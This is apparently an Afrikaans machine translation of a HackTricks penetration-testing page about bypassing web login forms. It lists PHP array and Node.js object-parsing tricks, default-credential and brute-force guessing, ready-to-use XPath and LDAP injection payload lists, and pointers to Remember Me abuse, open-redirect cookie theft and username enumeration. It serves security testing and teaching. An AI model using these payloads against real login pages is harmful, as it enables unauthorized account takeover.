Login Bypass

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

RootedCON is die mees relevante kuberveiligheid gebeurtenis in Spanje en een van die belangrikste in Europa. Met die missie om tegniese kennis te bevorder, is hierdie kongres 'n bruisende ontmoetingspunt vir tegnologie en kuberveiligheid professionele in elke dissipline.

Bypass gereelde aanmelding

As jy 'n aanmeldbladsy vind, kan jy hier 'n paar tegnieke vind om te probeer om dit te omseil:

  • Kyk vir kommentaar binne die bladsy (scroll af en na regs?)

  • Kyk of jy direk toegang tot die beperkte bladsye kan kry

  • Kyk om nie die parameters te stuur nie (stuur geen of net 1)

  • Kyk na die PHP vergelykingsfout: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • Verander inhoud tipe na json en stuur json waardes (bool true ingesluit)

  • As jy 'n antwoord kry wat sê dat POST nie ondersteun word nie, kan jy probeer om die JSON in die liggaam te stuur maar met 'n GET versoek met Content-Type: application/json

  • Kyk na nodejs se potensiële ontledingsfout (lees hierdie): password[password]=1

  • Nodejs sal daardie payload omskep na 'n navraag soortgelyk aan die volgende: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; wat die wagwoordbit altyd waar maak.

  • As jy 'n JSON objek kan stuur, kan jy "password":{"password": 1} stuur om die aanmelding te omseil.

  • Onthou dat om hierdie aanmelding te omseil, jy steeds moet weet en 'n geldige gebruikersnaam stuur.

  • Voeg "stringifyObjects":true opsie by wanneer jy mysql.createConnection aanroep, sal uiteindelik alle onverwagte gedrag blokkeer wanneer Object in die parameter gestuur word.

  • Kyk na geloofsbriewe:

  • Standaard geloofsbriewe van die tegnologie/platform wat gebruik word

  • Gewone kombinasies (root, admin, wagwoord, naam van die tegnologie, standaard gebruiker met een van hierdie wagwoorde).

  • Skep 'n woordeboek met Cewl, voeg die standaard gebruikersnaam en wagwoord (as daar is) by en probeer om dit te brute-force met al die woorde as gebruikersname en wagwoord

  • Brute-force met 'n groter woordeboek (Brute force)

SQL Injection aanmeld omseiling

Hier kan jy verskeie truuks vind om die aanmelding via SQL injections te omseil.

Op die volgende bladsy kan jy 'n aangepaste lys vind om te probeer om aanmelding via SQL Injections te omseil:

Login bypass List

Geen SQL Injection aanmeld omseiling

Hier kan jy verskeie truuks vind om die aanmelding via Geen SQL Injections te omseil.

Aangesien die NoSQL Injections vereis dat die parameters waarde verander, sal jy dit handmatig moet toets.

XPath Injection aanmeld omseiling

Hier kan jy verskeie truuks vind om die aanmelding via XPath Injection.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection outentieke bypass

Hier kan jy verskeie truuks vind om die aanmelding via LDAP Injection te omseil.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Onthou My

As die bladsy "Onthou My" funksionaliteit het, kyk hoe dit geïmplementeer is en sien of jy dit kan misbruik om ander rekeninge oor te neem.

Oorgange

Bladsye lei gewoonlik gebruikers na aanmelding, kyk of jy daardie oorgang kan verander om 'n Open Redirect te veroorsaak. Miskien kan jy 'n paar inligting (kodes, koekies...) steel as jy die gebruiker na jou web lei.

Ander Kontroles

  • Kyk of jy gebruikernames kan opnoem deur die aanmeldfunksionaliteit te misbruik.

  • Kyk of outo-voltooi aktief is in die wagwoord/sensitiewe inligting vorms invoer: <input autocomplete="false"

​​RootedCON is die mees relevante kuberveiligheid gebeurtenis in Spanje en een van die belangrikste in Europa. Met die missie om tegniese kennis te bevorder, is hierdie kongres 'n bruisende ontmoetingspunt vir tegnologie en kuberveiligheid professionele in elke dissipline.

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Last updated